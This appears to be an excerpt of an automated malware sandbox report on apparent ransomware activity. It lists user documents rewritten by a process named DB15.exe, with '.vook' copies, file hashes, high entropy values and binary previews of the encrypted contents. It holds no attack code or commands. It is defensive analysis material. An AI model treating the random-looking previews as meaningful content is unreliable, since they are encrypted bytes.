                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:CqzROMcybb/0XfOIz1QQ8YWz4Au/m/HOEld8JOza/mh8+nPZNDYcjnrnQjRL9xJk:CqzROp8CrhQ/Fumvld8QzLhBN0cfnQZi
                                                                                                                                                                                                                                      MD5:186947416B18C7451DFEF9C0C465C358
                                                                                                                                                                                                                                      SHA1:6B0B5C4BD7899DF24898AAA936193F071C234FCC
                                                                                                                                                                                                                                      SHA-256:13BC09569A95DCD61063ED0A69AA06283552239321A01632D9DE9CD25CE49F3D
                                                                                                                                                                                                                                      SHA-512:07A8604230586988A9D041F3C352C3C8C3D15C1AC6AC1E71A46FA33DCD35932F4563781DBD356ED3351A0A31F5EA091AECA94B2B1A591897F86E16325391D0CB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ...(..N. .8..h}..%I.^..B`.....Y..d.5'.7(-......l.........n..}{.!2L.2qw..J........P>...Z.....>..9.1...j52.OI8.^.)..K16MH.0^.Q..<0.(.~...U..;......>..Z.6!.vL...9=..!.....*....xgd|.bi....T.t..$....5.a.`eyF..M&.......i~`vQ...c.W....[..r..v.APr....l...(.*...U*XK...EL..cB+....O8.p....{3....xv`.s.....7.r.&...l.+..^..X......../.B.)_y@.$R...%.......\c...c.}.j~pd........#.H..w..p^.l'-S(.<...U)g.....O...D4,N..^..3.Ny...+.O(XeG.....M.y...*..].......3ue......."...8.%c.(.....k0.....]h......A...E:mnm...Rg..(/...O.....[>.F..6.R_.F.33..L.K. &Xz.p.q..H...{9......"..5...7j.@..t.1^)V..P...?..7^..a........|..z$.~...6.hp....O...~-...........e..ag.n.....1.F.S...`.K.W......o...o..-...J..@s..2.....qq..<........P......I.EY.....^....)..:.YLH.N.N....W..n@.l...].gU..}...`.k.."..Y.z....;..47..E...].f....?4..~@..".x..].n.>..8k*......`C.i.....e.K*....i.g...Pz...Z...!...q.........X`...-...9..D'&..5.e\n.......|...:...?gfO.9X].Y....Q....#..Z.>._..T...#.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\SFPUSAFIOL.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.848270928071023
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:UpaOlyhLD1UXSbd6rHVX3wFHq+FQeIs7EcDmZ6nGwDL7CjSTsxFHiTkbD:gaeyUXPr1nk3QZs7EccGLOScFCiD
                                                                                                                                                                                                                                      MD5:F38F30CB6C4CE53F06500E1BE47AC025
                                                                                                                                                                                                                                      SHA1:3323800FBBB907644A5CFBC2952EF0CCF3F565BA
                                                                                                                                                                                                                                      SHA-256:9B09D0E2CED2E6C02D4771AD86CC8323F0E2A31CE8294AEA767E96D2623A732E
                                                                                                                                                                                                                                      SHA-512:AE93272A93A91E1CB0D7E6E697E5222333467598258801ADD71285C08802E092EB531C0FD04325BC2833DBB069E961DC32BEAC15FB83DE29482E968F96D128E0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS2.jp........._..C...>.........wH.zV[D..yu...,....co...Ej.$....p5.z...?.s.............~L.j..Ab.5l.._..89.B.I......aPa..2.Y.kSO.A.`.v.."_..i.}...`..E7.E@].......#u.-..9...U..S.'.....P.#k.[...C...} .......X...w.e....k..iC..C.>....'..!.3....y.....8...I6.;@...&#.}...yub..L.\......W&|.....g..^%.UP.#.w.O../.....s........]<...{../k.e..Q. %.t.$...#^5.b...P..S..|...I.a..c..o......jXbl.Q.z.......3.~Li.*..*.3.b2G.8..N.........)RK.=]BD.Q|..Pu.m...\......Ypn.J.3."`zX .:.....)..E........]..+....S.]^N~..:.......b.:&....9.....[..|.g/..*.........NyqA..p-Y..-.4.2.....O..W,e...[{...TvE..a.....8IC...H.7b....E.?~+(4M.3.Y.yS..48.....t..o'.....q.}._..4A...".\....&?.....O...../....3.G. D....F...B:I.fJ..k...8@.EC%.-(.U....4.k...C..msO..\.A..>..-x...%I.sl.4...-v..j.W^..rV..!P....4{..Ez.2.....h...-a..,....V..F.v.o....g.\..x../.".R_....H...r..z.2.>.^..V........0J.|...O..RG..D(\.(X...'.....Y.v...F?......A."...W..UO^..X.Y..:.^...{.e.....e+.....&L.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\SFPUSAFIOL.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.848270928071023
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:UpaOlyhLD1UXSbd6rHVX3wFHq+FQeIs7EcDmZ6nGwDL7CjSTsxFHiTkbD:gaeyUXPr1nk3QZs7EccGLOScFCiD
                                                                                                                                                                                                                                      MD5:F38F30CB6C4CE53F06500E1BE47AC025
                                                                                                                                                                                                                                      SHA1:3323800FBBB907644A5CFBC2952EF0CCF3F565BA
                                                                                                                                                                                                                                      SHA-256:9B09D0E2CED2E6C02D4771AD86CC8323F0E2A31CE8294AEA767E96D2623A732E
                                                                                                                                                                                                                                      SHA-512:AE93272A93A91E1CB0D7E6E697E5222333467598258801ADD71285C08802E092EB531C0FD04325BC2833DBB069E961DC32BEAC15FB83DE29482E968F96D128E0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS2.jp........._..C...>.........wH.zV[D..yu...,....co...Ej.$....p5.z...?.s.............~L.j..Ab.5l.._..89.B.I......aPa..2.Y.kSO.A.`.v.."_..i.}...`..E7.E@].......#u.-..9...U..S.'.....P.#k.[...C...} .......X...w.e....k..iC..C.>....'..!.3....y.....8...I6.;@...&#.}...yub..L.\......W&|.....g..^%.UP.#.w.O../.....s........]<...{../k.e..Q. %.t.$...#^5.b...P..S..|...I.a..c..o......jXbl.Q.z.......3.~Li.*..*.3.b2G.8..N.........)RK.=]BD.Q|..Pu.m...\......Ypn.J.3."`zX .:.....)..E........]..+....S.]^N~..:.......b.:&....9.....[..|.g/..*.........NyqA..p-Y..-.4.2.....O..W,e...[{...TvE..a.....8IC...H.7b....E.?~+(4M.3.Y.yS..48.....t..o'.....q.}._..4A...".\....&?.....O...../....3.G. D....F...B:I.fJ..k...8@.EC%.-(.U....4.k...C..msO..\.A..>..-x...%I.sl.4...-v..j.W^..rV..!P....4{..Ez.2.....h...-a..,....V..F.v.o....g.\..x../.".R_....H...r..z.2.>.^..V........0J.|...O..RG..D(\.(X...'.....Y.v...F?......A."...W..UO^..X.Y..:.^...{.e.....e+.....&L.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\SQRKHNBNYN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.83823837494891
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TvMZPSAS7wz0gjS2bkInqzHMnwN22QWjM8bkAc9qHFtJ1HcAA2iTkbD:wpzv5kIqzGwY2pAAc9OJl8iD
                                                                                                                                                                                                                                      MD5:F148987A0B4F4ED3F4DAFEAC4BF08431
                                                                                                                                                                                                                                      SHA1:5A6FC3EC3E704F5A57BE44AB259857117B9EDAD6
                                                                                                                                                                                                                                      SHA-256:834E8350AFF44687E455B2F0D99CA24494AE016DA45149E804C0AC0C9F128EB4
                                                                                                                                                                                                                                      SHA-512:AD48773B3430F23420AEB6621C9DE3E46A3D4C20F488A13A314CC1B2C9E1A6D331B31BA15A68113332556ED1E96EB52429858DC37CA2295700DBDDF243E1D1FD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKH..&......ih.......e."V>...rR@...<.....V...,...|a~70.U_;.aM.`....,'_x./.a.O...?..kg...8q..!@.yz.h5..}.s?...l..5..[...r...ZRf/>..UH...g...E.iP.0.;..i.A[....O...a.|..n..#._X....\y3P......u.....n:...M.f{.....m.56.L.zr...wl.t.7....X..%..2.....Fd(.<.H=..........\.S/.8...].<[.m.\J.........z.....!..E.|r:\;.L]....q..VK_+.......m4......;y.9E:.r#H.B....k.....W./Pm..@.$...9OuT..:........fT..ZS.ZR.t..C )..~...p9..~.#p.....8../P%..THjJ...3S.=4.P=......O..W .... c|K.f6...$..w..j..p....T..&.}H.$...^CFs........`Gf...#....xA.i..I..'.8.a.W..7.'.}D.K.H_x?O.o..Zs]...(m..\.nl.^..].<.A.I.F)....'[Bhe....r...{K|/rj.5L..YEd.<$.l$.D:(4.:.O.#.\G..Nq..{x.X..w..s=....L.......4:..8?.9..4/...nj..k.-w.Ml...:\.p.U.D;...S}.B......NS..?x5..{.......t:..W#[.... .,..)g....2...t.|%s.....3.!.w.~...+...Q..E...X6.M.$.}...............9.Z.)g.{.........18.0e."B....BcC}o....""Iw-.^.0_....!?h..9.6...[....=(.Y..+...V.......U...Bb....!..t.k._}..'.5q.2...yv..F%..`{...n../.....8.G1....._..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\SQRKHNBNYN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.83823837494891
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TvMZPSAS7wz0gjS2bkInqzHMnwN22QWjM8bkAc9qHFtJ1HcAA2iTkbD:wpzv5kIqzGwY2pAAc9OJl8iD
                                                                                                                                                                                                                                      MD5:F148987A0B4F4ED3F4DAFEAC4BF08431
                                                                                                                                                                                                                                      SHA1:5A6FC3EC3E704F5A57BE44AB259857117B9EDAD6
                                                                                                                                                                                                                                      SHA-256:834E8350AFF44687E455B2F0D99CA24494AE016DA45149E804C0AC0C9F128EB4
                                                                                                                                                                                                                                      SHA-512:AD48773B3430F23420AEB6621C9DE3E46A3D4C20F488A13A314CC1B2C9E1A6D331B31BA15A68113332556ED1E96EB52429858DC37CA2295700DBDDF243E1D1FD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKH..&......ih.......e."V>...rR@...<.....V...,...|a~70.U_;.aM.`....,'_x./.a.O...?..kg...8q..!@.yz.h5..}.s?...l..5..[...r...ZRf/>..UH...g...E.iP.0.;..i.A[....O...a.|..n..#._X....\y3P......u.....n:...M.f{.....m.56.L.zr...wl.t.7....X..%..2.....Fd(.<.H=..........\.S/.8...].<[.m.\J.........z.....!..E.|r:\;.L]....q..VK_+.......m4......;y.9E:.r#H.B....k.....W./Pm..@.$...9OuT..:........fT..ZS.ZR.t..C )..~...p9..~.#p.....8../P%..THjJ...3S.=4.P=......O..W .... c|K.f6...$..w..j..p....T..&.}H.$...^CFs........`Gf...#....xA.i..I..'.8.a.W..7.'.}D.K.H_x?O.o..Zs]...(m..\.nl.^..].<.A.I.F)....'[Bhe....r...{K|/rj.5L..YEd.<$.l$.D:(4.:.O.#.\G..Nq..{x.X..w..s=....L.......4:..8?.9..4/...nj..k.-w.Ml...:\.p.U.D;...S}.B......NS..?x5..{.......t:..W#[.... .,..)g....2...t.|%s.....3.!.w.~...+...Q..E...X6.M.$.}...............9.Z.)g.{.........18.0e."B....BcC}o....""Iw-.^.0_....!?h..9.6...[....=(.Y..+...V.......U...Bb....!..t.k._}..'.5q.2...yv..F%..`{...n../.....8.G1....._..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\UOOJJOZIRH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.834807138532964
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ak8NlgfPEeY6GRQJg63NimYDHZUrsnytyV2aaWkeLU0R0LJiTkbD:FylgEqGRwg63NG5Ursnmy9aWHXRniD
                                                                                                                                                                                                                                      MD5:630F9326833105775978956DAF56BCD3
                                                                                                                                                                                                                                      SHA1:8E1DBD1B5B0EEAF52F2068897711C978A6186274
                                                                                                                                                                                                                                      SHA-256:EFDFE770B306B6BDBCCF490F0C3A589628406CA7043A534A55E5CA2465362575
                                                                                                                                                                                                                                      SHA-512:F22758CBD4B2B3DBEA256CD5E75CC21BC52DBAF594B2398AEB3EFFB896FE9DFE9AC6BE259CFFE4668B6762F2BEB70BA6A0907D329773BCB9A70978390BD28DD0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ..v.7C.}C.t.#ln..i...8?\X......5.}.Y.sD.7.3$.y.f..n5.{4.?..[........i..34..0.ot.;.Y......\M.KHg.)......{...>@x.hm.:..2N...Q.B.."Q....&F.....h...C.$..[.'!Z.....l.:-B.x.9$..}.=M.E.@.U.Q........D.w..Dg.-.....`'..h....&Q}..*..6..:...F.O.....ao........../.........C[...b.c.&H......a..K..XQ.......Y.{.U...~..T......a?1..."fO.\..-.....WZ.~..3.*..&.#.Pj.*...6.DF+f./...s.c..P.......u(.j...3.9....=.%D.r..._..$.W...r.p.......P....m.V.......w_........G.=.W.....a.,_7."L..66&..^...).n 2t.f!.......v...E!_&.....v..{.$@.......3.p.c'A....8.lJ.".#21y."[J..oxh...Oy.....{...|r..f.....zYt......w-..1...Y:..g.'....b{.......]y.*..W..:d.?....\Q0c...i.MRa,^.."Sp)..j..7....t?'1.2h../9}....c..cnd.z.^..w...gH.N.[..KI@.H*.....:B....."...@.0.._*..0N.>$E~.....k.2<h.$.p...V.w.U#..n..q..`.88..TEu..?.."8.... ..3....4Tr./..T...b(..R.\.*6....2m..s..L..H.J..........1.cP.e....o._.....#./.{.I......d.8H.u.y^...H.A....q..QBg.{....ze %...c...v.|t..*z..k..^..X..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\UOOJJOZIRH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.834807138532964
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ak8NlgfPEeY6GRQJg63NimYDHZUrsnytyV2aaWkeLU0R0LJiTkbD:FylgEqGRwg63NG5Ursnmy9aWHXRniD
                                                                                                                                                                                                                                      MD5:630F9326833105775978956DAF56BCD3
                                                                                                                                                                                                                                      SHA1:8E1DBD1B5B0EEAF52F2068897711C978A6186274
                                                                                                                                                                                                                                      SHA-256:EFDFE770B306B6BDBCCF490F0C3A589628406CA7043A534A55E5CA2465362575
                                                                                                                                                                                                                                      SHA-512:F22758CBD4B2B3DBEA256CD5E75CC21BC52DBAF594B2398AEB3EFFB896FE9DFE9AC6BE259CFFE4668B6762F2BEB70BA6A0907D329773BCB9A70978390BD28DD0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ..v.7C.}C.t.#ln..i...8?\X......5.}.Y.sD.7.3$.y.f..n5.{4.?..[........i..34..0.ot.;.Y......\M.KHg.)......{...>@x.hm.:..2N...Q.B.."Q....&F.....h...C.$..[.'!Z.....l.:-B.x.9$..}.=M.E.@.U.Q........D.w..Dg.-.....`'..h....&Q}..*..6..:...F.O.....ao........../.........C[...b.c.&H......a..K..XQ.......Y.{.U...~..T......a?1..."fO.\..-.....WZ.~..3.*..&.#.Pj.*...6.DF+f./...s.c..P.......u(.j...3.9....=.%D.r..._..$.W...r.p.......P....m.V.......w_........G.=.W.....a.,_7."L..66&..^...).n 2t.f!.......v...E!_&.....v..{.$@.......3.p.c'A....8.lJ.".#21y."[J..oxh...Oy.....{...|r..f.....zYt......w-..1...Y:..g.'....b{.......]y.*..W..:d.?....\Q0c...i.MRa,^.."Sp)..j..7....t?'1.2h../9}....c..cnd.z.^..w...gH.N.[..KI@.H*.....:B....."...@.0.._*..0N.>$E~.....k.2<h.$.p...V.w.U#..n..q..`.88..TEu..?.."8.... ..3....4Tr./..T...b(..R.\.*6....2m..s..L..H.J..........1.cP.e....o._.....#./.{.I......d.8H.u.y^...H.A....q..QBg.{....ze %...c...v.|t..*z..k..^..X..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQSJKEBWDT.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.834500264365077
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:NL7EG1MjHLlR8rrYRUwgISmcxfImflt78/xZ/7WHQFZVH2iTkbD:97LCf/kVmcJ0/xN/tHziD
                                                                                                                                                                                                                                      MD5:6BD9226524D86CC4F5E727DD78492BF9
                                                                                                                                                                                                                                      SHA1:0CBDAC5391544BD0A0ABA031EE9FB5CFAF0D7D52
                                                                                                                                                                                                                                      SHA-256:D6F5333D7EA21B347326B6BD01F717DFD650ADF1D20DB28F935382D93842E6DD
                                                                                                                                                                                                                                      SHA-512:56018AF69AA2F419F8689C510AFEB1B459EF0234DE2A2063D1EF6AE5E6E3993C80E0BCF4578ACD1EF2292BF0CD38791E6143097931C6F10DDCA785B7535F9383
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK..hh\..nG...Q,b..$..+...R.,{....C..P)..Em...W0.u/..n'....u..^...L[.....'....s` .X:.F..{Hak.sX......1E....m..a..`...V....|W...6K.'....v.Y.^?.>J../..`.~.8......2.n+.?*...........0.<.8e.......`.-.........<..._z.L|..sa...j.j:..]_R..D...c....z.k...$...b@m...Z.......3.@.nIZ..e..=.:..]-%.[=.......F..F..r."..3..(.q..|..O..H...U......5i....P(..u.../Nl.=..;}..1^...CBf_@..h..^:@.r..d}.Y....A"y.y.q.WU...#.>\A~.h..*H.)@..u.%.y....R..N.{..p...lT!.~.9 ..+.~.%..fv.I..z.w..._...c.t1p...q4..S.t.x..V....LA..K...>..\$....x....9..5.Xs.Rfr..G.*~S.....:5=4.G..t..k....*=..<,,.o.A._.Aqf...>Q...z.....Q._V...|....s.h..J....@....2Q.I.....Da-.7.Q1.....i.,}F....u.@..._...E[..k.p....VH.}....5n0..+).T.Jc..M..s..'..f.S3...4..ZI(.>.us;j_...]"..W!8.....-....%.iB.H.GA....,$.9..n.....}Ls....[..0..j..)..;Z.E_.,H..'.....w.,...Z..E.'..T.$.tu#-..n,s2N....;lF.....%........J..\k.I.o.H.|@.....1...yRG;.+...5..`.-.e..=..../8B.{.....H......ei.....+......-......'oU5.N]*W.iW*...f|.....

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQSJKEBWDT.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.834500264365077
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:NL7EG1MjHLlR8rrYRUwgISmcxfImflt78/xZ/7WHQFZVH2iTkbD:97LCf/kVmcJ0/xN/tHziD
                                                                                                                                                                                                                                      MD5:6BD9226524D86CC4F5E727DD78492BF9
                                                                                                                                                                                                                                      SHA1:0CBDAC5391544BD0A0ABA031EE9FB5CFAF0D7D52
                                                                                                                                                                                                                                      SHA-256:D6F5333D7EA21B347326B6BD01F717DFD650ADF1D20DB28F935382D93842E6DD
                                                                                                                                                                                                                                      SHA-512:56018AF69AA2F419F8689C510AFEB1B459EF0234DE2A2063D1EF6AE5E6E3993C80E0BCF4578ACD1EF2292BF0CD38791E6143097931C6F10DDCA785B7535F9383
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK..hh\..nG...Q,b..$..+...R.,{....C..P)..Em...W0.u/..n'....u..^...L[.....'....s` .X:.F..{Hak.sX......1E....m..a..`...V....|W...6K.'....v.Y.^?.>J../..`.~.8......2.n+.?*...........0.<.8e.......`.-.........<..._z.L|..sa...j.j:..]_R..D...c....z.k...$...b@m...Z.......3.@.nIZ..e..=.:..]-%.[=.......F..F..r."..3..(.q..|..O..H...U......5i....P(..u.../Nl.=..;}..1^...CBf_@..h..^:@.r..d}.Y....A"y.y.q.WU...#.>\A~.h..*H.)@..u.%.y....R..N.{..p...lT!.~.9 ..+.~.%..fv.I..z.w..._...c.t1p...q4..S.t.x..V....LA..K...>..\$....x....9..5.Xs.Rfr..G.*~S.....:5=4.G..t..k....*=..<,,.o.A._.Aqf...>Q...z.....Q._V...|....s.h..J....@....2Q.I.....Da-.7.Q1.....i.,}F....u.@..._...E[..k.p....VH.}....5n0..+).T.Jc..M..s..'..f.S3...4..ZI(.>.us;j_...]"..W!8.....-....%.iB.H.GA....,$.9..n.....}Ls....[..0..j..)..;Z.E_.,H..'.....w.,...Z..E.'..T.$.tu#-..n,s2N....;lF.....%........J..\k.I.o.H.|@.....1...yRG;.+...5..`.-.e..=..../8B.{.....H......ei.....+......-......'oU5.N]*W.iW*...f|.....

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850708598933933
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:0JrK9ptjo63ludVpNpLynSuQ9621Iy8052AbbCgkS/nxYM6t2Bl+qw99+JLuEON1:Qr+TEd3NpLaoIy8BzgkUxytUL8kZtiD
                                                                                                                                                                                                                                      MD5:72156884852B9316E92ACC8B146098AF
                                                                                                                                                                                                                                      SHA1:A35DAF11746878341A750056059133FBDF546FA8
                                                                                                                                                                                                                                      SHA-256:78B7AB4B6DD89D50CD5E175EF64EEC1EC278B7222A56188ADB9742899D720223
                                                                                                                                                                                                                                      SHA-512:0A00421BA667F48E5537AC00ED6416E9FB8581AC4423B0D9F20825FD3DFC09AF60B7A070FBF02725D9A2B55B4C02CF270EC541D7D16358BAD3756DC2125D23B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ*5....Z..F]../......n.1..."..W..C....7.>c..$.f.0n.\K=..9..e4}6V.v~....-..~.\..1.E....#.. .+..K.f...HT..&f..........z...5,N..b...:6.G.H...@>........Gn^J.P...2...MQ..r....^..%NH..G?fxX..'........W...2R.._.y.....'.h7.xr.w.".(.]...I1..V.!%.......m.2..DB...)6..X...c.D....C.x"..V....L.{.&.M."f.5..i...L.f...>&!....we...BJX.l5..F*..Z...c%.dx..'#7......Y.p..8<k'....z.u...Y.P..*.4....O...V.7.di.%j0...#.....b..0....E.9.U..ko^.).ob..mI..?......T..GI...O.....Z............w....aA.,..N.k........>..8J..KzH\.l.n..-Jn.*.7o|.........Q.5K.5.YY........xa.t.z#....B.........q....a..OJ......c...%..~....e..@\M..8..v....y+e.].Hb..X^o.M.`...._...i.7$..d.!a[.S...E.....7@V.gPza..D.&...8._..3..gt.~.1"..`._.....e.......JZH...-R..\mH.od#.1...-.w...S..Y.|wD..<,..5....+:..a....z^...t+.DF....$+>..5.S.\KI.7....$.3..........l.}.ac.L.-..#. ..9`.U.|].ok$..6.u.[b.B0p.D#(...zV.8A.S.8......A...9T.xf+..|.@.r....k9...!2M._..a.!.c.s.Uu.G...&...CRu.3.Y..i...h........k."h.....g..

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850708598933933
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:0JrK9ptjo63ludVpNpLynSuQ9621Iy8052AbbCgkS/nxYM6t2Bl+qw99+JLuEON1:Qr+TEd3NpLaoIy8BzgkUxytUL8kZtiD
                                                                                                                                                                                                                                      MD5:72156884852B9316E92ACC8B146098AF
                                                                                                                                                                                                                                      SHA1:A35DAF11746878341A750056059133FBDF546FA8
                                                                                                                                                                                                                                      SHA-256:78B7AB4B6DD89D50CD5E175EF64EEC1EC278B7222A56188ADB9742899D720223
                                                                                                                                                                                                                                      SHA-512:0A00421BA667F48E5537AC00ED6416E9FB8581AC4423B0D9F20825FD3DFC09AF60B7A070FBF02725D9A2B55B4C02CF270EC541D7D16358BAD3756DC2125D23B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ*5....Z..F]../......n.1..."..W..C....7.>c..$.f.0n.\K=..9..e4}6V.v~....-..~.\..1.E....#.. .+..K.f...HT..&f..........z...5,N..b...:6.G.H...@>........Gn^J.P...2...MQ..r....^..%NH..G?fxX..'........W...2R.._.y.....'.h7.xr.w.".(.]...I1..V.!%.......m.2..DB...)6..X...c.D....C.x"..V....L.{.&.M."f.5..i...L.f...>&!....we...BJX.l5..F*..Z...c%.dx..'#7......Y.p..8<k'....z.u...Y.P..*.4....O...V.7.di.%j0...#.....b..0....E.9.U..ko^.).ob..mI..?......T..GI...O.....Z............w....aA.,..N.k........>..8J..KzH\.l.n..-Jn.*.7o|.........Q.5K.5.YY........xa.t.z#....B.........q....a..OJ......c...%..~....e..@\M..8..v....y+e.].Hb..X^o.M.`...._...i.7$..d.!a[.S...E.....7@V.gPza..D.&...8._..3..gt.~.1"..`._.....e.......JZH...-R..\mH.od#.1...-.w...S..Y.|wD..<,..5....+:..a....z^...t+.DF....$+>..5.S.\KI.7....$.3..........l.}.ac.L.-..#. ..9`.U.|].ok$..6.u.[b.B0p.D#(...zV.8A.S.8......A...9T.xf+..|.@.r....k9...!2M._..a.!.c.s.Uu.G...&...CRu.3.Y..i...h........k."h.....g..

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855011494569558
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Avs1K+8TT+XesFCD6h+oLgj6YebrqnG8VZHjKL4slbppMrW1J5vBKew4hwiTkbD:oLT+X14vmmarC1jwMrW17cnUiD
                                                                                                                                                                                                                                      MD5:DC466D6B526CACDA854EA42BDF224428
                                                                                                                                                                                                                                      SHA1:E14ED7E18537327E8A46DDB4DEA4DD0D1B39E384
                                                                                                                                                                                                                                      SHA-256:808CBE24CAA24DD555813DD0AB8A8F47B12EEC02268487AE867904BF020E1479
                                                                                                                                                                                                                                      SHA-512:23FC095E0C14D96B40ECCE815F3C1E441007975095F09884F792844807F7DCFEAF7B9FA28B4C7E3D5B2180D50068A89CDAE9CD3CB51D97850CDB7964F417E367
                                                                                                                                                                                                                                      Malicious:false
